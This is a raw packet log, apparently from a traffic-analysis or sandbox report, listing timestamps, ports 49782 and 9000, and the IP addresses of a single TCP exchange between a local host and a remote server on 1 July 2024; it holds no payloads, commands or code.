Jul 1, 2024 09:16:32.650717020 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.650787115 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650799036 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650810003 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650823116 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650835037 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650835991 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.650846958 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.650861979 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.650873899 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.650902987 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.651041985 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651055098 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651067972 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651079893 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651092052 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651093006 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.651103020 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651115894 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651120901 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.651134014 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.651154995 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.651232958 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651246071 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651282072 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.651288986 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651387930 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651433945 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.651468992 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651482105 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651494026 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651506901 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651518106 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.651530981 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.651559114 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.651582956 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651705980 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651715994 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651751995 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.651926994 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651937008 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651949883 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.651976109 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.651993036 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.652026892 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.652039051 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.652050018 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.652061939 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.652081966 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.652096033 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.653346062 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.653424978 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.653728962 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.653742075 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.653753042 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.653774977 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.653803110 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.653814077 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.653827906 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.653839111 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.653868914 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.654278994 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.654299021 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.654310942 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.654320955 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.654335022 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.654340982 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.654356956 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.654371023 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.654413939 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.654426098 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.654438972 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.654449940 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.654450893 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.654464006 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.654479980 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.654582977 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.654705048 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.658000946 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.658037901 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.658047915 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.658087969 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.658101082 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.658102989 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.658113956 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.658126116 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.658139944 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.658149958 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.658171892 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.658180952 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.658282995 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.671173096 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.671185970 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.671206951 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.671217918 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.671228886 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.671230078 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.671245098 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.671264887 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.671271086 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.671277046 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.671320915 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.671325922 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.671483994 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.705981970 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.706001997 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.706015110 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.706026077 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.706037998 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.706049919 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.706062078 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.706072092 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.706073046 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.706090927 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.706119061 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.727097034 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.727108955 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.727119923 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.727153063 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.727164030 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.727201939 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.727206945 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.727206945 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.727215052 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.727253914 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.727258921 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.727271080 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.727312088 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.730448961 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.730482101 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.730493069 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.730509996 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.730549097 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.730588913 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.730602026 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.730612993 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.730624914 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.730638027 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.730667114 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.733433008 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.733445883 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.733458042 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.733470917 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.733486891 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.733505964 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.733669043 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.733680964 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.733691931 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.733717918 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.733743906 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.733903885 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.733915091 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.733925104 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.733944893 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.733951092 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.733958960 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.733963966 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.733975887 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.733977079 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.733987093 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.733989000 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.734009981 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.734045982 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.734180927 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.734191895 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.734204054 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.734215975 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.734227896 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.734235048 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.734241009 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.734253883 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.734260082 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.734271049 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.734298944 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.734303951 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.734347105 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.740912914 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.740931988 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.740946054 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.740974903 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.740988970 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741029978 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741072893 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741094112 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741106033 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741117954 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741148949 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741156101 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741156101 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741161108 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741178036 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741189003 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741202116 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741220951 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741305113 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741317987 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741353989 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741388083 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741400957 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741411924 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741424084 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741436005 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741449118 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741452932 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741466999 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741492033 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741583109 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741594076 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741605997 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741616964 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741631031 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741646051 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741724014 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741734982 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741744995 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741756916 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741784096 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741810083 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741874933 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741885900 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741897106 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741942883 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.741971970 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741983891 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.741996050 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.742037058 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.742058039 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.742069960 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.742113113 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.742137909 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.742149115 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.742160082 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.742185116 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.742197990 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.742520094 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.742531061 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.742542028 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.742562056 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.742567062 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.742573977 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.742580891 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.742587090 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.742598057 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.742614985 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.742629051 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.742654085 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.742666006 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.742702961 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.744348049 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.744385004 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.744395018 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.744436979 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.744452953 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.744465113 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.744545937 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.744558096 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.744569063 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.744585991 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.744601011 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.744622946 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.744962931 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.744973898 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.744986057 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.745001078 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.745006084 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.745009899 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.745018005 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.745028019 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.745045900 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.745057106 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.745062113 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.745074034 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.745084047 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.745119095 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.748693943 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.748716116 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.748727083 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.748768091 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.748857975 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.748868942 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.748881102 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.748892069 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.748903036 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.748923063 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.748939037 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.761820078 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.761832952 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.761840105 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.761946917 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.761957884 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.761969090 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.761981964 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.761985064 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.762032032 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.796431065 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.796452999 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.796464920 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.796535015 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.796535015 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.796552896 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.796566010 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.796577930 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.796591043 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.796617985 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.796617985 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.817837000 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.817857981 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.817868948 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.817910910 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.817946911 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.817970037 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.817981005 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.817994118 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.818082094 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.818232059 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.818392038 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.821557045 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.821603060 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.821625948 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.821636915 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.821647882 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.821695089 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.821886063 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.821897984 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.821914911 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.821927071 CEST	9000	49782	195.201.251.214	192.168.2.4
